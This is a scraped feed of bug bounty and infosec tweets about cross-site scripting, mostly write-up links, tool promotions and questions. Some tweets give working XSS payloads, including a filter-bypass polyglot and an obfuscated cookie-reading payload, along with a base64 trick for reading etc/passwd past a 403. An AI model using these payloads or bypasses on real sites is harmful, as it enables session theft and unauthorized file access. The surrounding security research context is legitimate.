@Th3Pr0xyB0y2 years agoIn case someone finds any issues on @bxsshunter feel free to dm or @bxsshunter . Update - There was server load today we handled it effectively with little down time of 5-10 minutes Signup Now At https://t.co/VRQCgNtZht #xsshunter #bxsshunter #bxss #bugbountytips #bugbounty
![profile](https://pbs.twimg.com/profile_images/1346695790132006912/RXsf_WQ3_normal.jpg)
bugbountymemes
@bugbounty_memes2 years agoMake sure you are using Trusted Service when using alternatives to XssHunter Imagine you got 50+ Payload fired but not able to login your so called XssHunter alternatives #bugbounty #xss
![profile](https://pbs.twimg.com/profile_images/1536918615320059905/H2nTRpbN_normal.jpg)
Rahmat Qurishi
@RahmatQurishi2 years agoI earned $100 for my submission on @bugcrowd 1.Signed up to main website. 2.browsed subdomains, found an endpoint that was vulnerable to xss Payload: <script>alert(origin)</script> Easy bug🙂 #ItTakesACrowd #BugBounty
![profile](https://pbs.twimg.com/profile_images/1611746652670365696/RStyd501_normal.jpg)
Lewis
@0reoSec2 years ago@ptswarm: 💬 New article by our researcher Aleksey Solovev: "MyBB <= 1.8.31: Remote Code Execution Chain". 🐞 Abusing Nested Parsers Conditions for getting XSS 🐞 From Privileged SQL Injection to RCE Read the article: https://t.co/FrTXqlF0LK #cybersecurity #infosec @0reoSec
![profile](https://pbs.twimg.com/profile_images/1480570633159380992/BZp_zCyO_normal.jpg)
PwnLab.Me
@PwnlabMe2 years agoDetaylı bir XSS reposu; https://t.co/Yyr98j65Q4 #cybersecurity #git #github #xss #bugbounty
![profile](https://pbs.twimg.com/profile_images/1616562586467684396/G-YSRH46_normal.jpg)
XSS Report
@XssReport2 years ago"We are truly delighted that you have received a reward by using our platform. We hope you will be able to receive even more beautiful rewards. Congratulations!" #xss #bugbounty via https://t.co/uVCBeExkBl https://t.co/qAkPogSvWb
![profile](https://pbs.twimg.com/profile_images/1608512503910404102/U7cKFcIc_normal.jpg)
Jefferson Gonzales
@gonzxph2 years agoXSSHunter Alternative Since the xsshunter will be deprecated this 1st of February here's the two alternative website you can try for blind xss 1. https://t.co/rHOI00NcUP 2. https://t.co/nUeMkoBwhZ by @CyberXplore #bugbountytips #BugBounty #xss
![profile](https://pbs.twimg.com/profile_images/1613160686791852036/6iWFmSgh_normal.jpg)
Cyber Zilla
@SunilAd942142932 years agoWhat tool do you use to automate blind xss??? #BugBounty #togetherwehitharder #bugbountytip
![profile](https://pbs.twimg.com/profile_images/1610626347709112321/XFrREd5N_normal.jpg)
Goziem
@g0ziem2 years agoXSS Report is another alternative. Features: 1. XSS payloads 2. Info about where the payload fired. https://t.co/tqglrLHhD7 #bxsshunter #xss #bugbountytips #bxss #xsshunter #bxss
![profile](https://pbs.twimg.com/profile_images/1364087716934078466/zRX1e_Bj_normal.jpg)
🇮🇳 ! Bõt âmît
@Botami1432 years ago### WAF / Cloudflare Bypass 25+ XSS Payloads #bugbountytips #BugBounty #bugbountytip #xss #cybersecuritytips #cybersecurity #sqlinjection #hacker #Hacking https://t.co/bfe2zuVtxI
![profile](https://pbs.twimg.com/profile_images/1576423044347723777/c9SjREd3_normal.jpg)
M1n@Cris
@Minacris890M2 years agoWhat do you use for blind XSS hits these days? I've used @XssHunter before, but since it is going to be deprecated on Feb 1 I'm looking for an alternative #bugbountytips #bugbounty #xss
![profile](https://pbs.twimg.com/profile_images/1601664448925556736/xFqeWsSg_normal.jpg)
Mike Takahashi
@TakSec2 years agoTips for getting into Bug Bounty - Part 2: 1. Pick a topic on @PortSwigger Web Security Academy, such as XSS: https://t.co/wioDWTzs9W 2. Hack the labs for that vulnerability type 3. If you can't beat one out, look at the answer and learn how it works #infosec #bugbountytips https://t.co/Eou9nDEfED
![profile](https://pbs.twimg.com/profile_images/1561977257585004544/ady7v0G4_normal.jpg)
Crazy
@0PWorld2 years agoHelp : i found XSS Payload Fired On https://t.co/oUP5NjB7ha but when i try to open url say : This site can’t be reached how can i open it look pic #infosec #cybersecurity #cybersecuritytips #bugbountytips https://t.co/XAtwOd5BTs
![profile](https://pbs.twimg.com/profile_images/1404125874350264322/6G0a9c7a_normal.jpg)
payloadartist
@payloadartist2 years agoXSS using postMessage in Google Cloud Theia notebooks https://t.co/7VDivVojGJ By @sivaneshashok @kl_sree #infosec #bugbounty #bugbountytips #Hacking #cloudsecurity https://t.co/AIKGio2V0R
![profile](https://pbs.twimg.com/profile_images/1593665222082179075/y4eFSxQ9_normal.jpg)
7h3h4ckv157
@7h3h4ckv1572 years agoThe ultimate tool for discovering and reporting vulnerabilities. With BXSSHUNTER: 📢 https://t.co/JciPPOjHtF 1- XSS HUNTER Dashboard 2- Pro XSS Reports 3- Payload Tracking 4- Host Remote Payloads 5- Learning Hub 6- Instant XSS Alerts #infosec #BugBounty #bugbountytips #xss
![profile](https://pbs.twimg.com/profile_images/1570840088397090816/rWOAH9mz_normal.jpg)
HackTube5
@HackTube52 years ago3 One line Bug Bounty Tips #BugBounty 1. Always check for common vulnerabilities such as SQL injection, XSS, and CSRF. 2. Test for both known and unknown vulnerabilities by using both manual and automated testing methods. 3. Keep an eye out for subdomains and test them as well.
![profile](https://pbs.twimg.com/profile_images/914907986568638466/j6ZJi9cC_normal.jpg)
LinuxSecurity
@lnxsec2 years agoWant to scan for XSS vulns in your websites/web apps? Then look no further than Pwn XSS, a powerful tool used by malicious hackers & security professionals alike! Learn how to install & run Pwn XSS👇https://t.co/Lf8DN6BK3G Given it a try? What do you think? #infosec #Linux
![profile](https://pbs.twimg.com/profile_images/1154307934513455104/o_NShtHX_normal.jpg)
Th3Pr0xyB0y
@Th3Pr0xyB0y2 years agoGreat news for the security community! bxsshunter by @CyberXplore is free for everyone & it has been developed for the community. #bugbountytips #xss #BugBounty #bxss #bxsshunter #blindxss #xsshunter https://t.co/dkpJfKFGhl
![profile](https://pbs.twimg.com/profile_images/1154307934513455104/o_NShtHX_normal.jpg)
Th3Pr0xyB0y
@Th3Pr0xyB0y2 years ago6- Instant XSS Alerts An Alternative To XSS Hunter From @CyberXplore For Any Queries Contact @bxsshunter or email us at [email protected] #xss #xsshunter #bxsshunter #cybersecurity #bugbountytips #bugbounty #BXSS #XSSHunter
![profile](https://pbs.twimg.com/profile_images/1154307934513455104/o_NShtHX_normal.jpg)
Th3Pr0xyB0y
@Th3Pr0xyB0y2 years agoImprove your XSS hunting with BXSSHUNTER - Join our community for xss tips, instant notifications, easy reports, and a public profile to showcase your skills. signup now at https://t.co/VRQCgNtZht & elevate your game now! #bxsshunter #xss #bugbountytips #bxss #xsshunter #bxss https://t.co/10MrLU8OeO
![profile](https://pbs.twimg.com/profile_images/1558723901621800961/skZhtP_i_normal.jpg)
x1m
@x1m_martijn2 years agoWhat do you use for blind XSS hits these days? I've used @XssHunter before, but since it is going to be deprecated on Feb 1 I'm looking for an alternative #bugbountytips #bugbounty #xss
![profile](https://pbs.twimg.com/profile_images/1297066624084672513/Y3uXhGKy_normal.jpg)
Sexcurity | Make love, not war!
@s3xcur1ty2 years agoMengintip Dashboard Admin Situs Haram (Bahasa Indonesia) - @kustirama https://t.co/4dHxxv3e9d #InfoSec #CyberSecurity #Security #XSS #BlindXSS #StoredXSS #WriteUp #BugHunting #BugBounty
![profile](https://pbs.twimg.com/profile_images/982721685609746433/hxP_vMq9_normal.jpg)
Securityblog
@Securityblog2 years agoReflected XSS Leads to 3,000$ Bug Bounty Rewards from Microsoft Forms | by Supakiad S. (m3ez) | Jan, 2023 | InfoSec Write-ups https://t.co/I1eFfLxuzw
![profile](https://pbs.twimg.com/profile_images/1557290969766457344/xoSk7tPH_normal.jpg)
Pentester Academy
@SecurityTube2 years agoEver wanted to know how XSS attacks work? Try it hands-on, for free! In this lab exercise, you will pentest a vulnerable web application with the XSSer tool. Sign in at https://t.co/vfBZUZ9khb and get started at https://t.co/9eVbY19yLq #XSS #pentest #infosec https://t.co/PWE3GGCeUB
![profile](https://pbs.twimg.com/profile_images/1424030409910747142/hIxFunDl_normal.jpg)
Nur Rokhim
@Noerrokhim19972 years agoXSS on the https://t.co/XtCggaGaGi Full video: https://t.co/Q7CvRc2nuk #cyber #BugBounty #cybersecurity # https://t.co/SmZmzUDaQp
![profile](https://pbs.twimg.com/profile_images/1573240538039746560/buTP5mKO_normal.jpg)
Muhammed Farish
@muhamedfarish2 years agohttps://t.co/MGw3kjtWKf #cybersecurity #bug #bugbounty #security #computerscience #networks #hacking #hacker #programming #ethicalhacking #pentesting #kalilinux #parrotos #coding #Fetlla #Medium #infosec
![profile](https://pbs.twimg.com/profile_images/1595328943753756672/f5H9Ushy_normal.jpg)
Lu3ky13
@lu3ky132 years agoYay, I was awarded a $3100 bounty on @Hacker0x01! https://t.co/JRIv8Fju4i #TogetherWeHitHarder the first time I submitted an xss like this ><script>alert(1)</script> I bypassed JSON response second, after the fixed bug, I found a bypass with its payload #BugBounty #bugtips
![profile](https://pbs.twimg.com/profile_images/1614833164895100929/qcxGFmuZ_normal.png)
Marcos Furquim
@markinfurkin2 years agoMais um para o bug bounty #BugBounty #reverseengineering #xss https://t.co/4fajTQNS1Z
![profile](https://pbs.twimg.com/profile_images/1557095801272373248/RmJX2gB4_normal.jpg)
RedPacket Security
@RedPacketSec2 years agoHackerOne Bug Bounty Disclosure: xss-on-link-and-window-openerbypisarenko - https://t.co/uKxdZcWtSf #HackerOne #CVE #Vulnerability #OSINT #ThreatIntel #Cyber
![profile](https://pbs.twimg.com/profile_images/1516186231083876352/ahW_7jzj_normal.jpg)
Thee Eclipse
@Thee_Eclipse2 years agoA simple straight forward DOM XSS exploit in #jQuery at @PortSwigger by @intigriti #XSS #Hacking #hackingtools #intigriti https://t.co/a1RE8wgTSO
![profile](https://pbs.twimg.com/profile_images/1575156737430425600/BIbggAKB_normal.jpg)
H1 Disclosed - Public Disclosures
@h1Disclosed2 years ago⚡ XSS on link and window.opener 👨💻 pisarenko ➟ Slack 🟧 Medium 💰 $1000.0 https://t.co/T2K6IuaMPD #bugbounty #bugbountytips #cybersecurity https://t.co/JeeeVS3Lab
![profile](https://pbs.twimg.com/profile_images/1617282451549872129/eZ2MHxu2_normal.jpg)
Сомьядип Мандал👾
@wtf_yodhha2 years agoCredit @GodfatherOrwa url/?f=etc/passwd ==> 403 encode etc/passwd as base64 url/?f=L2V0Yy9wYXNzd2Q= ==> 200 #note you can use this trick in SQL , SSTI , XSS , LFI , Etc... #bugbountytips #bugbountytip https://t.co/c885FZ578v
![profile](https://pbs.twimg.com/profile_images/1068000400068902912/Ou19T91q_normal.jpg)
BlackClover
@Bc10ver2 years agoTop story: @GodfatherOrwa: 'url/?f=etc/passwd ==> 403 encode etc/passwd as base64 url/?f=L2V0Yy9wYXNzd2Q= ==> 200 #note you can use this trick in SQL , SSTI , XSS , LFI , Etc... #bugbountytips #bugbountytip ' https://t.co/KNEOJ3hXJo, see more https://t.co/neOMbBi5Ty
![profile](https://pbs.twimg.com/profile_images/1543995467927027712/HZ1bs4IU_normal.jpg)
Begin n Bounty
@beginnbounty2 years agoIf the input is being reflected in a JavaScript context and is being passed through the encodeURIComponent function, it is possible to use certain characters to bypass the encoding and potentially execute an XSS attack. #AppSec #infosec
![profile](https://pbs.twimg.com/profile_images/1615189162855997440/uAxj5eaz_normal.jpg)
Godfather Orwa 🇯🇴
@GodfatherOrwa2 years agourl/?f=etc/passwd ==> 403 encode etc/passwd as base64 url/?f=L2V0Yy9wYXNzd2Q= ==> 200 #note you can use this trick in SQL , SSTI , XSS , LFI , Etc... #bugbountytips #bugbountytip https://t.co/vEd2UdjTMi
![profile](https://pbs.twimg.com/profile_images/1609078042554667008/9qSUFTXl_normal.jpg)
Rohan.exe 🖤
@roohaa_n2 years agoYay, I was awarded a $550 bounty on @Hacker0x01! My First bounty ever :) Tip : Use your blind xss payload every where in contact form or in customer support #TogetherWeHitHarder #bugbounty #bugbountytips https://t.co/Q8lMOrKGR1
![profile](https://pbs.twimg.com/profile_images/1344962042973794304/93BZHi0l_normal.jpg)
iSecurity
@iSecurity2 years agoUnderstanding the XSS Threat: A Comprehensive Guide to DOM Based Cross Site Scripting Vulnerability https://t.co/HSLW4e0hSX #cybersecurity #hacking #bugbounty
![profile](https://pbs.twimg.com/profile_images/1578478250585563136/Hh9_cDXc_normal.jpg)
Amit Kumar🇮🇳
@Amitlt22 years agoUnderstanding the XSS Threat: A Comprehensive Guide to DOM Based Cross Site Scripting Vulnerability. #CyberSecurity #BugBounty #bugbountytip #xss #Hacking https://t.co/U10mMLB6Yd
![profile](https://pbs.twimg.com/profile_images/878331088686297088/RvmSU7y4_normal.jpg)
Linux Security Labs
@LSELabs2 years agoTool review: Pybelt (pentest toolkit) #xss #infosec #tools https://t.co/NRf1kIPJgV
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroup2 years agoFind hidden GET parameters in javascript files #bugbountytips #BugBounty #bugbountytip #xss #cybersecuritytips #cybersecurity #sqlinjection #hacker #Hacking https://t.co/P6AXRYz4L8
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacks2 years ago(CVE-2023-0410): Cross-site Scripting (XSS) - Generic in builderio/qwik. https://t.co/rDeKNXZYUP Disclosed by https://t.co/I1YxmrfsDA, fixed by @adamdbradley... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1420213645900881924/rm9-MCbG_normal.png)
Hot10Security
@Hot10Security2 years agoPopular keywords used with #vulnerability tweets Date: 2023-01-22 Unique Tweets: 167 TOP 10 KEYWORDS 1: Cross 2: Site 3: Scripting 4: XSS 5: Request 6: Forgery 7: CSRF 8: WP 9: Injection 10: SQL bot-tweet #infosec #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1554247466559717379/ARwP_88G_normal.jpg)
Pepe Venegas
@Pepe_V102 years agoCross-site Scripting - I have just completed this room: https://t.co/dFqbfD0yt2 #tryhackme #XSS #Cross-Site Scripting #DOM #Reflected XSS #Stored XSS #Blind XSS #Polyglot #xssgi via @realtryhackme #Security #ethicalhacking #Hacking #hacker #hackers #IT #learning
![profile](https://pbs.twimg.com/profile_images/1081057521719078912/OqWfdeQ6_normal.jpg)
azu
@azu_re2 years ago見てる: "Reflected XSS Leads to 3,000$ Bug Bounty Rewards from Microsoft Forms | by Supakiad S. (m3ez) | Jan, 2023 | InfoSec Write-ups" https://t.co/xOemcB0IvJ
![profile](https://pbs.twimg.com/profile_images/1598179360900780034/Gywep4k9_normal.jpg)
Het Mehta
@hetmehtaa2 years agoReflected XSS Leads to 3,000$ Bug Bounty Rewards from Microsoft Forms #Infosec #BugBounty #CyberSecurity #xss https://t.co/Fls9DX4e1D
![profile](https://pbs.twimg.com/profile_images/1343113218399600641/p04QylMY_normal.jpg)
CyberIQs
@CyberIQs_2 years agoReflected XSS Leads to 3,000$ Bug Bounty Rewards from Microsoft Forms #infosec #infosecurity #cybersecurity #threatintel #threatintelligence #hacking #cybernews #cyberattack #cloudsecurity #malware #ransomware #cyber #threathunting #ZeroTrust #CISA https://t.co/Hu1tkKH4cQ
![profile](https://pbs.twimg.com/profile_images/1364087716934078466/zRX1e_Bj_normal.jpg)
🇮🇳 ! Bõt âmît
@Botami1432 years agoCRLF Injection to XSS #bugbountytips #BugBounty #bugbountytip #cybersecuritytips #cybersecurity #hacker #Hacking https://t.co/umuXV9fTdW
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatoris2 years agoCross site scripting and the use of http-only cookies? - Visit https://t.co/E0jEgfOFhh for the answer. #xss #attack_vector #infosec #developers #developerlife
![profile](https://pbs.twimg.com/profile_images/1552259034035941376/Bo8EZfW-_normal.png)
Bhavesh Harmalkar 🇮🇳
@bhavesharmalkar2 years ago#Learn365 Day 22: Read random blogs 1. Learn to build it, then break it 2. Reflected XSS Leads to 3,000$ 3. How I found XSS on Admin Page without login! 4. Critical bug on google by get full access on [Google Cloud BI Hackathon] (1/n) #cybersecurity #BugBounty
![profile](https://pbs.twimg.com/profile_images/1596188881535533056/mLqZh1Vm_normal.jpg)
iris
@IrisTech_2 years ago108/365 Finished OWASP Top 10 room on TryHackMe. XSS Payloads are fun 🤭 #100DaysOfHacking #365DaysOfHacking #womenintech #cybersecurity #infosec #womenintech #TechTwitter
![profile](https://pbs.twimg.com/profile_images/1610626347709112321/XFrREd5N_normal.jpg)
Goziem
@g0ziem2 years agoHow can I use Nuclei to find xss bug #BugBounty #bugbountytips
![profile](https://pbs.twimg.com/profile_images/1169067340828250113/02WuFDki_normal.jpg)
My Space!
@Supakiad_Mee2 years agoI'm excited to share my latest write-up about vulnerability found on the Microsoft Security Response Center bug bounty program, which highlights the vulnerabilities I discovered and the rewards received. https://t.co/yCf49p3bK0 #bugbounty #cybersecurity #MSRC #ethicalhacking
![profile](https://pbs.twimg.com/profile_images/1615287258680070146/Tg26M-Zt_normal.jpg)
Constantin Mic
@ConstantinMic2 years agoThis polyglot XSS payload can still bypass to many filters: jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e #bugbountytips #cybersecurity #it
![profile](https://pbs.twimg.com/profile_images/1406037441975365632/9k55bIyk_normal.jpg)
VassBot
@vassbot2 years ago@hackuu_ you can Hey everyone! @Vassbot is the best when it comes to protecting your #WordPress site from Cross Site Scripting (XSS) vulnerabilities in Conversational Forms for ChatBot <= 1.1.6. Protect your website, trust the experts. #cybersecurity #hacking
![profile](https://pbs.twimg.com/profile_images/1600705047301586944/uNoJXpfG_normal.jpg)
Fares Walid
@SirBagoza2 years agoI have published my first write-up 🤭About: Using CSRF + XSS to account takeover 🥰🥰 https://t.co/iik0DrrPKT #BugBounty #bugbountytips #Hacking https://t.co/KeQiJCsq0b
![profile](https://pbs.twimg.com/profile_images/1364087716934078466/zRX1e_Bj_normal.jpg)
🇮🇳 ! Bõt âmît
@Botami1432 years agoFind hidden GET parameters in javascript files #bugbountytips #BugBounty #bugbountytip #xss #cybersecuritytips #cybersecurity #sqlinjection #hacker #Hacking https://t.co/9EXrPGpdOO
![profile](https://pbs.twimg.com/profile_images/1106570929352658944/ixbVu7JG_normal.png)
terjanq
@terjanq2 years ago@irsdl @infosec_au Yeah. I did pwn a few cases where XSS was only on login page. The easiest is to open one window with auth content, do crsf-logout, open xss and read sensitive info from auth window (:
![profile](https://pbs.twimg.com/profile_images/1604736569083973632/lPu9htJ5_normal.jpg)
InfoSec Ninja 🇮🇳
@InfosecMonk2 years agoI completed the Web Security Academy lab: Reflected XSS into HTML context with nothing encoded: <script>alert(1)</script> @WebSecAcademy #xss #bugbounty #webappsec https://t.co/Sfs9LPgaEL
![profile](https://pbs.twimg.com/profile_images/1551404378711793664/oW_81tga_normal.jpg)
at once
@atonce112206042 years agoCalling all curious minds! Check out my latest Medium article on "Uncovering a Reflected XSS on a Public Bug Bounty Program" by clicking the link below. https://t.co/olEg7KFnSE Follow for more engaging content. #medium #article #community #BugBounty #xss #bugcrowd
![profile](https://pbs.twimg.com/profile_images/1610626347709112321/XFrREd5N_normal.jpg)
Goziem
@g0ziem2 years agoHow do I find xss using Nuclei? @pdnuclei #BugBounty #infosec #bugbountytips #xss #cybersecuritytips
![profile](https://pbs.twimg.com/profile_images/1617019243794501637/5oF-ci6F_normal.jpg)
Drugs Hack
@DrugsHack2 years agoAwesome #XSS https://t.co/FAccSSEzi8… #bugbounty #bugbountytips #cybersecurity https://t.co/P8k3SxO6Fd
![profile](https://pbs.twimg.com/profile_images/1568926750557540357/ZmtGuxe-_normal.jpg)
mnkeni francis
@MnkeniFrancis2 years agoronin-rb/ronin-vulns: Tests URLs for Local File Inclusion (LFI), Remote File Inclusion (RFI), SQL injection (SQLi), and Cross Site Scripting (XSS), Server Side Template In... #Cybersecurity #infosec #security via https://t.co/olBiC9iZIh https://t.co/LGoia3OJ38
![profile](https://pbs.twimg.com/profile_images/1420213645900881924/rm9-MCbG_normal.png)
Hot10Security
@Hot10Security2 years agoPopular keywords used with #vulnerability tweets Date: 2023-01-21 Unique Tweets: 173 TOP 10 KEYWORDS 1: Cross 2: Site 3: Vigil 4: Scripting 5: XSS 6: Request 7: Forgery 8: CSRF 9: Vulnerability 10: RCE bot-tweet #infosec #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1344962042973794304/93BZHi0l_normal.jpg)
iSecurity
@iSecurity2 years agoWhat is cross-site scripting (XSS)? Web App Pen-testing https://t.co/yWBHulTC01 #cybersecurity #bugbounty #xssattack
![profile](https://pbs.twimg.com/profile_images/1106570929352658944/ixbVu7JG_normal.png)
terjanq
@terjanq2 years ago@irsdl @infosec_au You can steal credentials stored in a password manager in both scenarios. There are also a few tricks that let you "unauthenicate" a user for a moment, and then after XSS re-authenticate them.
![profile](https://pbs.twimg.com/profile_images/1534581085212131329/qKF_k5_i_normal.jpg)
Stalwart
@the_unswerving2 years agoXSS Powerful Methodology for Beginners #Infosec via https://t.co/yNOfVDx5DP https://t.co/XTKnCK4ZZj
![profile](https://pbs.twimg.com/profile_images/1513406849827188741/iHJzoru__normal.png)
Anton
@therceman2 years ago@infosec_au Or injecting custom payloads into local storage… and if there is a flaw in reflection on client-side can be used to achieve Stored-XSS too. So pre-auth XSS is bad, especially if you can find a way how to turn it into Stored XSS later.
![profile](https://pbs.twimg.com/profile_images/1513406849827188741/iHJzoru__normal.png)
Anton
@therceman2 years ago@infosec_au I believe that pre-auth XSS can be used for injecting custom cookies that later in some cases can be used to achieve Stored-XSS for auth users
![profile](https://pbs.twimg.com/profile_images/1533457001107562498/1oXfGilM_normal.jpg)
Md Ismail Šojal
@0x0SojalSec2 years agoXSS Methodology for Beginners full :⚔️🛡️ https://t.co/oFQ3ua4aaF #infosec #cybersec #bugbountytips
![profile](https://pbs.twimg.com/profile_images/1533457001107562498/1oXfGilM_normal.jpg)
Md Ismail Šojal
@0x0SojalSec2 years agoGlobalProtect XSS https://globalprotect/global-protect/login.esp?user=j%22;-alert(1)-%22x #infosecurity #bugbountytips #cybersecuritytips
![profile](https://pbs.twimg.com/profile_images/1533457001107562498/1oXfGilM_normal.jpg)
Md Ismail Šojal
@0x0SojalSec2 years agoYou can bypass a WAF during a XSS attack on ASP(dot)NET-IIS technology by using a HTTP parameter pollution attack #infosecurity #bugbountytips https://t.co/9NoUy2CuEB
![profile](https://pbs.twimg.com/profile_images/1356492237220294657/yOpun9t3_normal.jpg)
CYBER4ALL
@cyber_4all2 years agoBasic Linux Commands #linux #unix #terminal #commands #files #network #processes #compression #permissions #cyberattacks #cybersecurity #dataprivacy #infosec #malware #blueteam #Soc #phishing #xss #malicious_insiders #forensic #cyber4all #c4a #ethicalhacking #learning4all https://t.co/Ahb6PWpznk
![profile](https://pbs.twimg.com/profile_images/1159451801361534981/LLzq3yBl_normal.jpg)
Ricardo Iramar
@ricardo_iramar2 years ago@irsdl @infosec_au IMO cannot be compared with self-xss. Imagine a user receives a link from a valid domain with an encoded payload and it opens in a browser. The login page appears and the user provides the credentials. The xss payload sends the credentials directly to an attacker.
![profile](https://pbs.twimg.com/profile_images/1507871051107155974/H5ReuvZ6_normal.jpg)
Soroush Dalili 🗹
@irsdl2 years ago@infosec_au Safe to say it is similar to self xss when it is unauth? or you think it can be worse? Obviously it is worse when user is authenticated
![profile](https://pbs.twimg.com/profile_images/1507871051107155974/H5ReuvZ6_normal.jpg)
Soroush Dalili 🗹
@irsdl2 years ago@infosec_au I normally don’t think about pre or post auth when it comes to xss unless it is stored. You made me thinking 🤔
![profile](https://pbs.twimg.com/profile_images/1550997937223770112/Vuwd45Jf_normal.png)
Bug bounty notes
@bugbounty02 years agoI Hope This Sticks: Analyzing ClipboardEvent Listeners for Stored XSS #bugbounty #bugbountytip #infosec #bugbountytips https://t.co/7labBhSn6r
![profile](https://pbs.twimg.com/profile_images/1550997937223770112/Vuwd45Jf_normal.png)
Bug bounty notes
@bugbounty02 years agoHow I was able to steal users credentials via Swagger UI DOM-XSS #bugbounty #bugbountytip #infosec #bugbountytips https://t.co/djTJmmaNoB
![profile](https://pbs.twimg.com/profile_images/1550997937223770112/Vuwd45Jf_normal.png)
Bug bounty notes
@bugbounty02 years agoCVE-2022–42710: A journey through XXE to Stored-XSS #bugbounty #bugbountytip #infosec #bugbountytips https://t.co/kyYNklvFwz
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatoris2 years agoXssing without opening a new html tag < - Visit https://t.co/9snA7cDqGS for the solution. #web_application #xss #infosec #tech #engineering
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatoris2 years agojQuery $.get HTML code and XSS - Visit https://t.co/VqKDI1pgX6 for the solution. #xss #ajax #jquery #infosec #peoplewhocode
![profile](https://pbs.twimg.com/profile_images/1467418634398015496/uP3n8IB1_normal.jpg)
SentientJohnny
@SentientJohnny2 years agoChange ones name in a certain, sacred way to perform an XSS attack on the Book of Life; hacking universalism into existence, or banning specific targets from Heaven.
![profile](https://pbs.twimg.com/profile_images/1601664448925556736/xFqeWsSg_normal.jpg)
Mike Takahashi
@TakSec2 years agoXSS Cookie Exfil by voiddy Payload w/ confirm: "/></div><div/OnpOinTeReNter=eval&lpar;"var&nbsp;u='nt.c'.concat('ook'.concat('ie'));confirm&lpar;eval&lpar;'do'.concat('cume'.concat(u))&rpar;&rpar;"&rpar;>click here<input type="hidden=alert https://t.co/PJRNsCWjFL #bugbounty
![profile](https://pbs.twimg.com/profile_images/1089185605911752705/e8j99QcU_normal.jpg)
infosec-jobs.com
@infosec_jobsCOM2 years agoHIRING: Analyste CERT / Incident Responder senior (H/F) / Sèvres, France https://t.co/IsMfrD6a7L #InfoSec #InfoSecJobs #Cybersecurity #jobsearch #hiringnow #CyberCareers #Sèvres #France #ActiveDirectory #C #CISSP #Cloud #DDoS #EDR #Forensics #GCFA #GCIH #GIAC #Linux #XSS
![profile](https://pbs.twimg.com/profile_images/1372763198986756100/mvwLpH_M_normal.jpg)
Priyanshu Sahay
@priyanshu_itech2 years agoHow To Do CSRF Exploitation By Using Stored XSS Vulnerability – #TUTORIAL [Video] https://t.co/cbmZOolVKl #penetrationtesting #infosec #security #hackersonlineclub #cybersecurity
![profile](https://pbs.twimg.com/profile_images/627732999161823232/QF5met-h_normal.jpg)
Hackers Online Club (HOC)
@HOCupdate2 years agoHow To Do CSRF Exploitation By Using Stored XSS Vulnerability – #TUTORIAL [Video] https://t.co/ApsPZ0W1AH #penetrationtesting #infosec #security #hackersonlineclub #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacks2 years ago(CVE-2023-0338): Cross-site Scripting (XSS) - Reflected in lirantal/daloradius. https://t.co/Od0ApQg1D7 Disclosed by https://t.co/E1qF4lGgfX, fixed by @filippolauria... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacks2 years ago(CVE-2023-0337): Cross-site Scripting (XSS) - Reflected in lirantal/daloradius. https://t.co/JqMD4xSZdl Disclosed by https://t.co/E1qF4lGO5v, fixed by @filippolauria... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/914907986568638466/j6ZJi9cC_normal.jpg)
LinuxSecurity
@lnxsec2 years agoWant to scan for XSS vulns in websites/web apps?🔓 Then look no further than Pwn XSS, a powerful tool used by malicious hackers & security professionals alike. Learn how to install & run Pwn XSS👇👇 https://t.co/Lf8DN6ChTe Given it a try? What you think?🤔 #linux #infosec
![profile](https://pbs.twimg.com/profile_images/1455872947953049602/87xmzeuM_normal.jpg)
saad alhrby
@LazySaad2 years agoi found this bug https://t.co/cjTtRl5eUo in website but xss didn`t triggred is it worths to report our leave it? btw it loads the source from https://t.co/i45lbZv9wR ... ... #bugbounty
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatoris2 years agoHow to ensure that files uploaded by users do not contain any XSS code - Visit https://t.co/aFlWAx0jEa for the answer. #javascript #xss #threat_mitigation #infosec #programming
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatoris2 years agoNewline XSS vulnerability - Visit https://t.co/CZ0xU8Yfrt for the solution. #javascript #xss #infosec #programmer #developer
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatoris2 years agoScript tag loading "https://t.co/uHBy5hANKh" in e-commerce transaction data - real attack or something else? - Visit https://t.co/SS3savhjv5 for the answer. #attacks #xss #javascript #e_commerce #infosec
![profile](https://pbs.twimg.com/profile_images/1475684641621397511/cfuVbh5A_normal.jpg)
Glênnio
@iGlennio2 years agoEncontrei um XSS Stored no SIS da Rede Globo. O ataque foi identificado e corrigido em 30 minuto. Mas infelizmente para equipe, devido a demora estou a 3 passos a frente. #hacking #Pentesting #XSS #GloboNews #GloboNewsEmPonto #RedeBBB #RedeGlobo #CyberSecurityAwareness #BugBounty https://t.co/MISHpz4t5S
![profile](https://pbs.twimg.com/profile_images/1410323546165833728/NuguMAm2_normal.jpg)
fletch
@fletch_ai2 years agoFletch Top Threat Alert: Vulnerability Spotlight: XSS vulnerability in Ghost CMS - #CVE-2022-47194 #FletchScore = Medium/Emerging #CyberSecurity #ThreatIntel #InfoSec CVE-2022-47197 CVE-2022-47195 CVE-2022-47194 CVE-2022-47196 https://t.co/K9gQv9obyb
